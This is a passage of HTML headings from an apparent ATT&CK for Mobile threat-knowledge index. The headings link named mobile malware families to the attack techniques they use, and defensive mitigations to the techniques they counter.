<h3 id="_use_recent_os_version_mob_m1006_mitigates_lock_user_out_of_device_mob_t1049"><a class="anchor" href="#_use_recent_os_version_mob_m1006_mitigates_lock_user_out_of_device_mob_t1049"></a><a class="link" href="#_use_recent_os_version_mob_m1006_mitigates_lock_user_out_of_device_mob_t1049">Use Recent OS Version (MOB-M1006) mitigates Lock User Out of Device (MOB-T1049)</a></h3>
</div>
<div class="sect2">
<h3 id="_pjapps_mob_s0007_uses_local_network_configuration_discovery_mob_t1025"><a class="anchor" href="#_pjapps_mob_s0007_uses_local_network_configuration_discovery_mob_t1025"></a><a class="link" href="#_pjapps_mob_s0007_uses_local_network_configuration_discovery_mob_t1025">PJApps (MOB-S0007) uses Local Network Configuration Discovery (MOB-T1025)</a></h3>
</div>
<div class="sect2">
<h3 id="_hummingbad_mob_s0038_uses_exploit_os_vulnerability_mob_t1007"><a class="anchor" href="#_hummingbad_mob_s0038_uses_exploit_os_vulnerability_mob_t1007"></a><a class="link" href="#_hummingbad_mob_s0038_uses_exploit_os_vulnerability_mob_t1007">HummingBad (MOB-S0038) uses Exploit OS Vulnerability (MOB-T1007)</a></h3>
</div>
<div class="sect2">
<h3 id="_oldboot_mob_s0001_uses_modify_os_kernel_or_boot_partition_mob_t1001"><a class="anchor" href="#_oldboot_mob_s0001_uses_modify_os_kernel_or_boot_partition_mob_t1001"></a><a class="link" href="#_oldboot_mob_s0001_uses_modify_os_kernel_or_boot_partition_mob_t1001">OldBoot (MOB-S0001) uses Modify OS Kernel or Boot Partition (MOB-T1001)</a></h3>
</div>
<div class="sect2">
<h3 id="_security_updates_mob_m1001_mitigates_attack_pc_via_usb_connection_mob_t1030"><a class="anchor" href="#_security_updates_mob_m1001_mitigates_attack_pc_via_usb_connection_mob_t1030"></a><a class="link" href="#_security_updates_mob_m1001_mitigates_attack_pc_via_usb_connection_mob_t1030">Security Updates (MOB-M1001) mitigates Attack PC via USB Connection (MOB-T1030)</a></h3>
</div>
<div class="sect2">
<h3 id="_use_recent_os_version_mob_m1006_mitigates_access_sensitive_data_or_credentials_in_files_mob_t1012"><a class="anchor" href="#_use_recent_os_version_mob_m1006_mitigates_access_sensitive_data_or_credentials_in_files_mob_t1012"></a><a class="link" href="#_use_recent_os_version_mob_m1006_mitigates_access_sensitive_data_or_credentials_in_files_mob_t1012">Use Recent OS Version (MOB-M1006) mitigates Access Sensitive Data or Credentials in Files (MOB-T1012)</a></h3>
</div>
<div class="sect2">
<h3 id="_user_guidance_mob_m1011_mitigates_obtain_device_cloud_backups_mob_t1073"><a class="anchor" href="#_user_guidance_mob_m1011_mitigates_obtain_device_cloud_backups_mob_t1073"></a><a class="link" href="#_user_guidance_mob_m1011_mitigates_obtain_device_cloud_backups_mob_t1073">User Guidance (MOB-M1011) mitigates Obtain Device Cloud Backups (MOB-T1073)</a></h3>
</div>
<div class="sect2">
<h3 id="_pegasus_mob_s0005_uses_alternate_network_mediums_mob_t1041"><a class="anchor" href="#_pegasus_mob_s0005_uses_alternate_network_mediums_mob_t1041"></a><a class="link" href="#_pegasus_mob_s0005_uses_alternate_network_mediums_mob_t1041">Pegasus (MOB-S0005) uses Alternate Network Mediums (MOB-T1041)</a></h3>
</div>
<div class="sect2">
<h3 id="_pegasus_for_android_mob_s0032_uses_local_network_configuration_discovery_mob_t1025"><a class="anchor" href="#_pegasus_for_android_mob_s0032_uses_local_network_configuration_discovery_mob_t1025"></a><a class="link" href="#_pegasus_for_android_mob_s0032_uses_local_network_configuration_discovery_mob_t1025">Pegasus for Android (MOB-S0032) uses Local Network Configuration Discovery (MOB-T1025)</a></h3>
</div>
<div class="sect2">
<h3 id="_use_recent_os_version_mob_m1006_mitigates_exploit_via_charging_station_or_pc_mob_t1061"><a class="anchor" href="#_use_recent_os_version_mob_m1006_mitigates_exploit_via_charging_station_or_pc_mob_t1061"></a><a class="link" href="#_use_recent_os_version_mob_m1006_mitigates_exploit_via_charging_station_or_pc_mob_t1061">Use Recent OS Version (MOB-M1006) mitigates Exploit via Charging Station or PC (MOB-T1061)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_vetting_mob_m1005_mitigates_malicious_third_party_keyboard_app_mob_t1020"><a class="anchor" href="#_application_vetting_mob_m1005_mitigates_malicious_third_party_keyboard_app_mob_t1020"></a><a class="link" href="#_application_vetting_mob_m1005_mitigates_malicious_third_party_keyboard_app_mob_t1020">Application Vetting (MOB-M1005) mitigates Malicious Third Party Keyboard App (MOB-T1020)</a></h3>
</div>
<div class="sect2">
<h3 id="_use_recent_os_version_mob_m1006_mitigates_abuse_device_administrator_access_to_prevent_removal_mob_t1004"><a class="anchor" href="#_use_recent_os_version_mob_m1006_mitigates_abuse_device_administrator_access_to_prevent_removal_mob_t1004"></a><a class="link" href="#_use_recent_os_version_mob_m1006_mitigates_abuse_device_administrator_access_to_prevent_removal_mob_t1004">Use Recent OS Version (MOB-M1006) mitigates Abuse Device Administrator Access to Prevent Removal (MOB-T1004)</a></h3>
</div>
<div class="sect2">
<h3 id="_pegasus_for_android_mob_s0032_uses_application_discovery_mob_t1021"><a class="anchor" href="#_pegasus_for_android_mob_s0032_uses_application_discovery_mob_t1021"></a><a class="link" href="#_pegasus_for_android_mob_s0032_uses_application_discovery_mob_t1021">Pegasus for Android (MOB-S0032) uses Application Discovery (MOB-T1021)</a></h3>
</div>
<div class="sect2">
<h3 id="_caution_with_device_administrator_access_mob_m1007_mitigates_wipe_device_data_mob_t1050"><a class="anchor" href="#_caution_with_device_administrator_access_mob_m1007_mitigates_wipe_device_data_mob_t1050"></a><a class="link" href="#_caution_with_device_administrator_access_mob_m1007_mitigates_wipe_device_data_mob_t1050">Caution with Device Administrator Access (MOB-M1007) mitigates Wipe Device Data (MOB-T1050)</a></h3>
</div>
<div class="sect2">
<h3 id="_braintest_mob_s0009_uses_download_new_code_at_runtime_mob_t1010"><a class="anchor" href="#_braintest_mob_s0009_uses_download_new_code_at_runtime_mob_t1010"></a><a class="link" href="#_braintest_mob_s0009_uses_download_new_code_at_runtime_mob_t1010">BrainTest (MOB-S0009) uses Download New Code at Runtime (MOB-T1010)</a></h3>
</div>
<div class="sect2">
<h3 id="_droidjack_rat_mob_s0036_uses_microphone_or_camera_recordings_mob_t1032"><a class="anchor" href="#_droidjack_rat_mob_s0036_uses_microphone_or_camera_recordings_mob_t1032"></a><a class="link" href="#_droidjack_rat_mob_s0036_uses_microphone_or_camera_recordings_mob_t1032">DroidJack RAT (MOB-S0036) uses Microphone or Camera Recordings (MOB-T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_vetting_mob_m1005_mitigates_url_scheme_hijacking_mob_t1018"><a class="anchor" href="#_application_vetting_mob_m1005_mitigates_url_scheme_hijacking_mob_t1018"></a><a class="link" href="#_application_vetting_mob_m1005_mitigates_url_scheme_hijacking_mob_t1018">Application Vetting (MOB-M1005) mitigates URL Scheme Hijacking (MOB-T1018)</a></h3>
</div>
<div class="sect2">
<h3 id="_rcsandroid_mob_s0011_uses_download_new_code_at_runtime_mob_t1010"><a class="anchor" href="#_rcsandroid_mob_s0011_uses_download_new_code_at_runtime_mob_t1010"></a><a class="link" href="#_rcsandroid_mob_s0011_uses_download_new_code_at_runtime_mob_t1010">RCSAndroid (MOB-S0011) uses Download New Code at Runtime (MOB-T1010)</a></h3>
</div>
<div class="sect2">
<h3 id="_use_recent_os_version_mob_m1006_mitigates_attack_pc_via_usb_connection_mob_t1030"><a class="anchor" href="#_use_recent_os_version_mob_m1006_mitigates_attack_pc_via_usb_connection_mob_t1030"></a><a class="link" href="#_use_recent_os_version_mob_m1006_mitigates_attack_pc_via_usb_connection_mob_t1030">Use Recent OS Version (MOB-M1006) mitigates Attack PC via USB Connection (MOB-T1030)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_vetting_mob_m1005_mitigates_exploit_tee_vulnerability_mob_t1008"><a class="anchor" href="#_application_vetting_mob_m1005_mitigates_exploit_tee_vulnerability_mob_t1008"></a><a class="link" href="#_application_vetting_mob_m1005_mitigates_exploit_tee_vulnerability_mob_t1008">Application Vetting (MOB-M1005) mitigates Exploit TEE Vulnerability (MOB-T1008)</a></h3>
</div>
<div class="sect2">
<h3 id="_zerghelper_mob_s0003_uses_abuse_of_ios_enterprise_app_signing_key_mob_t1048"><a class="anchor" href="#_zerghelper_mob_s0003_uses_abuse_of_ios_enterprise_app_signing_key_mob_t1048"></a><a class="link" href="#_zerghelper_mob_s0003_uses_abuse_of_ios_enterprise_app_signing_key_mob_t1048">ZergHelper (MOB-S0003) uses Abuse of iOS Enterprise App Signing Key (MOB-T1048)</a></h3>
</div>
<div class="sect2">
<h3 id="_obad_mob_s0002_uses_abuse_device_administrator_access_to_prevent_removal_mob_t1004"><a class="anchor" href="#_obad_mob_s0002_uses_abuse_device_administrator_access_to_prevent_removal_mob_t1004"></a><a class="link" href="#_obad_mob_s0002_uses_abuse_device_administrator_access_to_prevent_removal_mob_t1004">OBAD (MOB-S0002) uses Abuse Device Administrator Access to Prevent Removal (MOB-T1004)</a></h3>
</div>
<div class="sect2">
<h3 id="_xbot_mob_s0014_uses_lock_user_out_of_device_mob_t1049"><a class="anchor" href="#_xbot_mob_s0014_uses_lock_user_out_of_device_mob_t1049"></a><a class="link" href="#_xbot_mob_s0014_uses_lock_user_out_of_device_mob_t1049">Xbot (MOB-S0014) uses Lock User Out of Device (MOB-T1049)</a></h3>
</div>
<div class="sect2">
<h3 id="_pegasus_for_android_mob_s0032_uses_access_sensitive_data_or_credentials_in_files_mob_t1012"><a class="anchor" href="#_pegasus_for_android_mob_s0032_uses_access_sensitive_data_or_credentials_in_files_mob_t1012"></a><a class="link" href="#_pegasus_for_android_mob_s0032_uses_access_sensitive_data_or_credentials_in_files_mob_t1012">Pegasus for Android (MOB-S0032) uses Access Sensitive Data or Credentials in Files (MOB-T1012)</a></h3>
</div>
<div class="sect2">
<h3 id="_charger_mob_s0039_uses_obfuscated_or_encrypted_payload_mob_t1009"><a class="anchor" href="#_charger_mob_s0039_uses_obfuscated_or_encrypted_payload_mob_t1009"></a><a class="link" href="#_charger_mob_s0039_uses_obfuscated_or_encrypted_payload_mob_t1009">Charger (MOB-S0039) uses Obfuscated or Encrypted Payload (MOB-T1009)</a></h3>
</div>
<div class="sect2">
<h3 id="_pegasus_mob_s0005_uses_access_sensitive_data_or_credentials_in_files_mob_t1012"><a class="anchor" href="#_pegasus_mob_s0005_uses_access_sensitive_data_or_credentials_in_files_mob_t1012"></a><a class="link" href="#_pegasus_mob_s0005_uses_access_sensitive_data_or_credentials_in_files_mob_t1012">Pegasus (MOB-S0005) uses Access Sensitive Data or Credentials in Files (MOB-T1012)</a></h3>
</div>
<div class="sect2">
<h3 id="_deploy_compromised_device_detection_method_mob_m1010_mitigates_lock_user_out_of_device_mob_t1049"><a class="anchor" href="#_deploy_compromised_device_detection_method_mob_m1010_mitigates_lock_user_out_of_device_mob_t1049"></a><a class="link" href="#_deploy_compromised_device_detection_method_mob_m1010_mitigates_lock_user_out_of_device_mob_t1049">Deploy Compromised Device Detection Method (MOB-M1010) mitigates Lock User Out of Device (MOB-T1049)</a></h3>
</div>
<div class="sect2">
<h3 id="_interconnection_filtering_mob_m1014_mitigates_exploit_ss7_to_redirect_phone_calls_sms_mob_t1052"><a class="anchor" href="#_interconnection_filtering_mob_m1014_mitigates_exploit_ss7_to_redirect_phone_calls_sms_mob_t1052"></a><a class="link" href="#_interconnection_filtering_mob_m1014_mitigates_exploit_ss7_to_redirect_phone_calls_sms_mob_t1052">Interconnection Filtering (MOB-M1014) mitigates Exploit SS7 to Redirect Phone Calls/SMS (MOB-T1052)</a></h3>
</div>
<div class="sect2">
<h3 id="_adups_mob_s0025_uses_access_call_log_mob_t1036"><a class="anchor" href="#_adups_mob_s0025_uses_access_call_log_mob_t1036"></a><a class="link" href="#_adups_mob_s0025_uses_access_call_log_mob_t1036">Adups (MOB-S0025) uses Access Call Log (MOB-T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_lock_bootloader_mob_m1003_mitigates_modify_os_kernel_or_boot_partition_mob_t1001"><a class="anchor" href="#_lock_bootloader_mob_m1003_mitigates_modify_os_kernel_or_boot_partition_mob_t1001"></a><a class="link" href="#_lock_bootloader_mob_m1003_mitigates_modify_os_kernel_or_boot_partition_mob_t1001">Lock Bootloader (MOB-M1003) mitigates Modify OS Kernel or Boot Partition (MOB-T1001)</a></h3>
</div>
<div class="sect2">
<h3 id="_security_updates_mob_m1001_mitigates_device_unlock_code_guessing_or_brute_force_mob_t1062"><a class="anchor" href="#_security_updates_mob_m1001_mitigates_device_unlock_code_guessing_or_brute_force_mob_t1062"></a><a class="link" href="#_security_updates_mob_m1001_mitigates_device_unlock_code_guessing_or_brute_force_mob_t1062">Security Updates (MOB-M1001) mitigates Device Unlock Code Guessing or Brute Force (MOB-T1062)</a></h3>
</div>
<div class="sect2">
<h3 id="_androidos_anserver_a_mob_s0026_uses_standard_application_layer_protocol_mob_t1040"><a class="anchor" href="#_androidos_anserver_a_mob_s0026_uses_standard_application_layer_protocol_mob_t1040"></a><a class="link" href="#_androidos_anserver_a_mob_s0026_uses_standard_application_layer_protocol_mob_t1040">ANDROIDOS_ANSERVER.A (MOB-S0026) uses Standard Application Layer Protocol (MOB-T1040)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_vetting_mob_m1005_mitigates_access_calendar_entries_mob_t1038"><a class="anchor" href="#_application_vetting_mob_m1005_mitigates_access_calendar_entries_mob_t1038"></a><a class="link" href="#_application_vetting_mob_m1005_mitigates_access_calendar_entries_mob_t1038">Application Vetting (MOB-M1005) mitigates Access Calendar Entries (MOB-T1038)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_vetting_mob_m1005_mitigates_abuse_device_administrator_access_to_prevent_removal_mob_t1004"><a class="anchor" href="#_application_vetting_mob_m1005_mitigates_abuse_device_administrator_access_to_prevent_removal_mob_t1004"></a><a class="link" href="#_application_vetting_mob_m1005_mitigates_abuse_device_administrator_access_to_prevent_removal_mob_t1004">Application Vetting (MOB-M1005) mitigates Abuse Device Administrator Access to Prevent Removal (MOB-T1004)</a></h3>
</div>
<div class="sect2">
<h3 id="_wirelurker_mob_s0028_uses_obfuscated_or_encrypted_payload_mob_t1009"><a class="anchor" href="#_wirelurker_mob_s0028_uses_obfuscated_or_encrypted_payload_mob_t1009"></a><a class="link" href="#_wirelurker_mob_s0028_uses_obfuscated_or_encrypted_payload_mob_t1009">WireLurker (MOB-S0028) uses Obfuscated or Encrypted Payload (MOB-T1009)</a></h3>
</div>
<div class="sect2">
<h3 id="_hummingwhale_mob_s0037_uses_generate_fraudulent_advertising_revenue_mob_t1075"><a class="anchor" href="#_hummingwhale_mob_s0037_uses_generate_fraudulent_advertising_revenue_mob_t1075"></a><a class="link" href="#_hummingwhale_mob_s0037_uses_generate_fraudulent_advertising_revenue_mob_t1075">HummingWhale (MOB-S0037) uses Generate Fraudulent Advertising Revenue (MOB-T1075)</a></h3>
</div>
<div class="sect2">
<h3 id="_enterprise_policy_mob_m1012_mitigates_device_unlock_code_guessing_or_brute_force_mob_t1062"><a class="anchor" href="#_enterprise_policy_mob_m1012_mitigates_device_unlock_code_guessing_or_brute_force_mob_t1062"></a><a class="link" href="#_enterprise_policy_mob_m1012_mitigates_device_unlock_code_guessing_or_brute_force_mob_t1062">Enterprise Policy (MOB-M1012) mitigates Device Unlock Code Guessing or Brute Force (MOB-T1062)</a></h3>
</div>
<div class="sect2">
<h3 id="_spynote_rat_mob_s0021_uses_access_sensitive_data_or_credentials_in_files_mob_t1012"><a class="anchor" href="#_spynote_rat_mob_s0021_uses_access_sensitive_data_or_credentials_in_files_mob_t1012"></a><a class="link" href="#_spynote_rat_mob_s0021_uses_access_sensitive_data_or_credentials_in_files_mob_t1012">SpyNote RAT (MOB-S0021) uses Access Sensitive Data or Credentials in Files (MOB-T1012)</a></h3>
</div>
<div class="sect2">
<h3 id="_use_recent_os_version_mob_m1006_mitigates_process_discovery_mob_t1027"><a class="anchor" href="#_use_recent_os_version_mob_m1006_mitigates_process_discovery_mob_t1027"></a><a class="link" href="#_use_recent_os_version_mob_m1006_mitigates_process_discovery_mob_t1027">Use Recent OS Version (MOB-M1006) mitigates Process Discovery (MOB-T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_vetting_mob_m1005_mitigates_manipulate_device_communication_mob_t1066"><a class="anchor" href="#_application_vetting_mob_m1005_mitigates_manipulate_device_communication_mob_t1066"></a><a class="link" href="#_application_vetting_mob_m1005_mitigates_manipulate_device_communication_mob_t1066">Application Vetting (MOB-M1005) mitigates Manipulate Device Communication (MOB-T1066)</a></h3>
</div>
<div class="sect2">
<h3 id="_use_recent_os_version_mob_m1006_mitigates_malicious_media_content_mob_t1060"><a class="anchor" href="#_use_recent_os_version_mob_m1006_mitigates_malicious_media_content_mob_t1060"></a><a class="link" href="#_use_recent_os_version_mob_m1006_mitigates_malicious_media_content_mob_t1060">Use Recent OS Version (MOB-M1006) mitigates Malicious Media Content (MOB-T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_android_chuli_a_mob_s0020_uses_capture_sms_messages_mob_t1015"><a class="anchor" href="#_android_chuli_a_mob_s0020_uses_capture_sms_messages_mob_t1015"></a><a class="link" href="#_android_chuli_a_mob_s0020_uses_capture_sms_messages_mob_t1015">Android/Chuli.A (MOB-S0020) uses Capture SMS Messages (MOB-T1015)</a></h3>
</div>
<div class="sect2">
<h3 id="_pegasus_mob_s0005_uses_malicious_web_content_mob_t1059"><a class="anchor" href="#_pegasus_mob_s0005_uses_malicious_web_content_mob_t1059"></a><a class="link" href="#_pegasus_mob_s0005_uses_malicious_web_content_mob_t1059">Pegasus (MOB-S0005) uses Malicious Web Content (MOB-T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_security_updates_mob_m1001_mitigates_network_traffic_capture_or_redirection_mob_t1013"><a class="anchor" href="#_security_updates_mob_m1001_mitigates_network_traffic_capture_or_redirection_mob_t1013"></a><a class="link" href="#_security_updates_mob_m1001_mitigates_network_traffic_capture_or_redirection_mob_t1013">Security Updates (MOB-M1001) mitigates Network Traffic Capture or Redirection (MOB-T1013)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_vetting_mob_m1005_mitigates_application_discovery_mob_t1021"><a class="anchor" href="#_application_vetting_mob_m1005_mitigates_application_discovery_mob_t1021"></a><a class="link" href="#_application_vetting_mob_m1005_mitigates_application_discovery_mob_t1021">Application Vetting (MOB-M1005) mitigates Application Discovery (MOB-T1021)</a></h3>
</div>
<div class="sect2">
<h3 id="_caution_with_device_administrator_access_mob_m1007_mitigates_lock_user_out_of_device_mob_t1049"><a class="anchor" href="#_caution_with_device_administrator_access_mob_m1007_mitigates_lock_user_out_of_device_mob_t1049"></a><a class="link" href="#_caution_with_device_administrator_access_mob_m1007_mitigates_lock_user_out_of_device_mob_t1049">Caution with Device Administrator Access (MOB-M1007) mitigates Lock User Out of Device (MOB-T1049)</a></h3>
</div>
<div class="sect2">
<h3 id="_androidoverlaymalware_mob_s0012_uses_app_delivered_via_web_download_mob_t1034"><a class="anchor" href="#_androidoverlaymalware_mob_s0012_uses_app_delivered_via_web_download_mob_t1034"></a><a class="link" href="#_androidoverlaymalware_mob_s0012_uses_app_delivered_via_web_download_mob_t1034">AndroidOverlayMalware (MOB-S0012) uses App Delivered via Web Download (MOB-T1034)</a></h3>
</div>
<div class="sect2">
<h3 id="_enterprise_policy_mob_m1012_mitigates_abuse_of_ios_enterprise_app_signing_key_mob_t1048"><a class="anchor" href="#_enterprise_policy_mob_m1012_mitigates_abuse_of_ios_enterprise_app_signing_key_mob_t1048"></a><a class="link" href="#_enterprise_policy_mob_m1012_mitigates_abuse_of_ios_enterprise_app_signing_key_mob_t1048">Enterprise Policy (MOB-M1012) mitigates Abuse of iOS Enterprise App Signing Key (MOB-T1048)</a></h3>
</div>
<div class="sect2">
<h3 id="_mazarbot_mob_s0019_uses_app_delivered_via_web_download_mob_t1034"><a class="anchor" href="#_mazarbot_mob_s0019_uses_app_delivered_via_web_download_mob_t1034"></a><a class="link" href="#_mazarbot_mob_s0019_uses_app_delivered_via_web_download_mob_t1034">MazarBOT (MOB-S0019) uses App Delivered via Web Download (MOB-T1034)</a></h3>
</div>
<div class="sect2">
<h3 id="_braintest_mob_s0009_uses_obfuscated_or_encrypted_payload_mob_t1009"><a class="anchor" href="#_braintest_mob_s0009_uses_obfuscated_or_encrypted_payload_mob_t1009"></a><a class="link" href="#_braintest_mob_s0009_uses_obfuscated_or_encrypted_payload_mob_t1009">BrainTest (MOB-S0009) uses Obfuscated or Encrypted Payload (MOB-T1009)</a></h3>
</div>
<div class="sect2">
<h3 id="_pegasus_mob_s0005_uses_microphone_or_camera_recordings_mob_t1032"><a class="anchor" href="#_pegasus_mob_s0005_uses_microphone_or_camera_recordings_mob_t1032"></a><a class="link" href="#_pegasus_mob_s0005_uses_microphone_or_camera_recordings_mob_t1032">Pegasus (MOB-S0005) uses Microphone or Camera Recordings (MOB-T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_vetting_mob_m1005_mitigates_wipe_device_data_mob_t1050"><a class="anchor" href="#_application_vetting_mob_m1005_mitigates_wipe_device_data_mob_t1050"></a><a class="link" href="#_application_vetting_mob_m1005_mitigates_wipe_device_data_mob_t1050">Application Vetting (MOB-M1005) mitigates Wipe Device Data (MOB-T1050)</a></h3>
</div>
<div class="sect2">
<h3 id="_security_updates_mob_m1001_mitigates_malicious_sms_message_mob_t1057"><a class="anchor" href="#_security_updates_mob_m1001_mitigates_malicious_sms_message_mob_t1057"></a><a class="link" href="#_security_updates_mob_m1001_mitigates_malicious_sms_message_mob_t1057">Security Updates (MOB-M1001) mitigates Malicious SMS Message (MOB-T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_pegasus_for_android_mob_s0032_uses_microphone_or_camera_recordings_mob_t1032"><a class="anchor" href="#_pegasus_for_android_mob_s0032_uses_microphone_or_camera_recordings_mob_t1032"></a><a class="link" href="#_pegasus_for_android_mob_s0032_uses_microphone_or_camera_recordings_mob_t1032">Pegasus for Android (MOB-S0032) uses Microphone or Camera Recordings (MOB-T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_use_recent_os_version_mob_m1006_mitigates_malicious_web_content_mob_t1059"><a class="anchor" href="#_use_recent_os_version_mob_m1006_mitigates_malicious_web_content_mob_t1059"></a><a class="link" href="#_use_recent_os_version_mob_m1006_mitigates_malicious_web_content_mob_t1059">Use Recent OS Version (MOB-M1006) mitigates Malicious Web Content (MOB-T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_pegasus_mob_s0005_uses_location_tracking_mob_t1033"><a class="anchor" href="#_pegasus_mob_s0005_uses_location_tracking_mob_t1033"></a><a class="link" href="#_pegasus_mob_s0005_uses_location_tracking_mob_t1033">Pegasus (MOB-S0005) uses Location Tracking (MOB-T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_adups_mob_s0025_uses_location_tracking_mob_t1033"><a class="anchor" href="#_adups_mob_s0025_uses_location_tracking_mob_t1033"></a><a class="link" href="#_adups_mob_s0025_uses_location_tracking_mob_t1033">Adups (MOB-S0025) uses Location Tracking (MOB-T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_shedun_mob_s0010_uses_exploit_os_vulnerability_mob_t1007"><a class="anchor" href="#_shedun_mob_s0010_uses_exploit_os_vulnerability_mob_t1007"></a><a class="link" href="#_shedun_mob_s0010_uses_exploit_os_vulnerability_mob_t1007">Shedun (MOB-S0010) uses Exploit OS Vulnerability (MOB-T1007)</a></h3>
</div>
<div class="sect2">
<h3 id="_xcodeghost_mob_s0013_uses_user_interface_spoofing_mob_t1014"><a class="anchor" href="#_xcodeghost_mob_s0013_uses_user_interface_spoofing_mob_t1014"></a><a class="link" href="#_xcodeghost_mob_s0013_uses_user_interface_spoofing_mob_t1014">XcodeGhost (MOB-S0013) uses User Interface Spoofing (MOB-T1014)</a></h3>
</div>
<div class="sect2">
<h3 id="_use_recent_os_version_mob_m1006_mitigates_malicious_sms_message_mob_t1057"><a class="anchor" href="#_use_recent_os_version_mob_m1006_mitigates_malicious_sms_message_mob_t1057"></a><a class="link" href="#_use_recent_os_version_mob_m1006_mitigates_malicious_sms_message_mob_t1057">Use Recent OS Version (MOB-M1006) mitigates Malicious SMS Message (MOB-T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_user_guidance_mob_m1011_mitigates_device_unlock_code_guessing_or_brute_force_mob_t1062"><a class="anchor" href="#_user_guidance_mob_m1011_mitigates_device_unlock_code_guessing_or_brute_force_mob_t1062"></a><a class="link" href="#_user_guidance_mob_m1011_mitigates_device_unlock_code_guessing_or_brute_force_mob_t1062">User Guidance (MOB-M1011) mitigates Device Unlock Code Guessing or Brute Force (MOB-T1062)</a></h3>
</div>
<div class="sect2">
<h3 id="_keyraider_mob_s0004_uses_lock_user_out_of_device_mob_t1049"><a class="anchor" href="#_keyraider_mob_s0004_uses_lock_user_out_of_device_mob_t1049"></a><a class="link" href="#_keyraider_mob_s0004_uses_lock_user_out_of_device_mob_t1049">KeyRaider (MOB-S0004) uses Lock User Out of Device (MOB-T1049)</a></h3>
</div>
<div class="sect2">
<h3 id="_x_agent_mob_s0030_uses_repackaged_application_mob_t1047"><a class="anchor" href="#_x_agent_mob_s0030_uses_repackaged_application_mob_t1047"></a><a class="link" href="#_x_agent_mob_s0030_uses_repackaged_application_mob_t1047">X-Agent (MOB-S0030) uses Repackaged Application (MOB-T1047)</a></h3>
</div>
<div class="sect2">
<h3 id="_dresscode_mob_s0016_uses_exploit_enterprise_resources_mob_t1031"><a class="anchor" href="#_dresscode_mob_s0016_uses_exploit_enterprise_resources_mob_t1031"></a><a class="link" href="#_dresscode_mob_s0016_uses_exploit_enterprise_resources_mob_t1031">DressCode (MOB-S0016) uses Exploit Enterprise Resources (MOB-T1031)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_vetting_mob_m1005_mitigates_generate_fraudulent_advertising_revenue_mob_t1075"><a class="anchor" href="#_application_vetting_mob_m1005_mitigates_generate_fraudulent_advertising_revenue_mob_t1075"></a><a class="link" href="#_application_vetting_mob_m1005_mitigates_generate_fraudulent_advertising_revenue_mob_t1075">Application Vetting (MOB-M1005) mitigates Generate Fraudulent Advertising Revenue (MOB-T1075)</a></h3>
</div>
<div class="sect2">
<h3 id="_attestation_mob_m1002_mitigates_modify_os_kernel_or_boot_partition_mob_t1001"><a class="anchor" href="#_attestation_mob_m1002_mitigates_modify_os_kernel_or_boot_partition_mob_t1001"></a><a class="link" href="#_attestation_mob_m1002_mitigates_modify_os_kernel_or_boot_partition_mob_t1001">Attestation (MOB-M1002) mitigates Modify OS Kernel or Boot Partition (MOB-T1001)</a></h3>
</div>
<div class="sect2">
<h3 id="_encrypt_network_traffic_mob_m1009_mitigates_rogue_cellular_base_station_mob_t1070"><a class="anchor" href="#_encrypt_network_traffic_mob_m1009_mitigates_rogue_cellular_base_station_mob_t1070"></a><a class="link" href="#_encrypt_network_traffic_mob_m1009_mitigates_rogue_cellular_base_station_mob_t1070">Encrypt Network Traffic (MOB-M1009) mitigates Rogue Cellular Base Station (MOB-T1070)</a></h3>
</div>
<div class="sect2">
<h3 id="_use_recent_os_version_mob_m1006_mitigates_exploit_tee_vulnerability_mob_t1008"><a class="anchor" href="#_use_recent_os_version_mob_m1006_mitigates_exploit_tee_vulnerability_mob_t1008"></a><a class="link" href="#_use_recent_os_version_mob_m1006_mitigates_exploit_tee_vulnerability_mob_t1008">Use Recent OS Version (MOB-M1006) mitigates Exploit TEE Vulnerability (MOB-T1008)</a></h3>
</div>
<div class="sect2">
<h3 id="_security_updates_mob_m1001_mitigates_capture_sms_messages_mob_t1015"><a class="anchor" href="#_security_updates_mob_m1001_mitigates_capture_sms_messages_mob_t1015"></a><a class="link" href="#_security_updates_mob_m1001_mitigates_capture_sms_messages_mob_t1015">Security Updates (MOB-M1001) mitigates Capture SMS Messages (MOB-T1015)</a></h3>
</div>
<div class="sect2">
<h3 id="_security_updates_mob_m1001_mitigates_malicious_web_content_mob_t1059"><a class="anchor" href="#_security_updates_mob_m1001_mitigates_malicious_web_content_mob_t1059"></a><a class="link" href="#_security_updates_mob_m1001_mitigates_malicious_web_content_mob_t1059">Security Updates (MOB-M1001) mitigates Malicious Web Content (MOB-T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_twitoor_mob_s0018_uses_standard_application_layer_protocol_mob_t1040"><a class="anchor" href="#_twitoor_mob_s0018_uses_standard_application_layer_protocol_mob_t1040"></a><a class="link" href="#_twitoor_mob_s0018_uses_standard_application_layer_protocol_mob_t1040">Twitoor (MOB-S0018) uses Standard Application Layer Protocol (MOB-T1040)</a></h3>
</div>
<div class="sect2">
<h3 id="_trojan_sms_androidos_opfake_a_mob_s0024_uses_standard_application_layer_protocol_mob_t1040"><a class="anchor" href="#_trojan_sms_androidos_opfake_a_mob_s0024_uses_standard_application_layer_protocol_mob_t1040"></a><a class="link" href="#_trojan_sms_androidos_opfake_a_mob_s0024_uses_standard_application_layer_protocol_mob_t1040">Trojan-SMS.AndroidOS.OpFake.a (MOB-S0024) uses Standard Application Layer Protocol (MOB-T1040)</a></h3>
</div>
<div class="sect2">
<h3 id="_system_partition_integrity_mob_m1004_mitigates_modify_system_partition_mob_t1003"><a class="anchor" href="#_system_partition_integrity_mob_m1004_mitigates_modify_system_partition_mob_t1003"></a><a class="link" href="#_system_partition_integrity_mob_m1004_mitigates_modify_system_partition_mob_t1003">System Partition Integrity (MOB-M1004) mitigates Modify System Partition (MOB-T1003)</a></h3>
</div>
<div class="sect2">
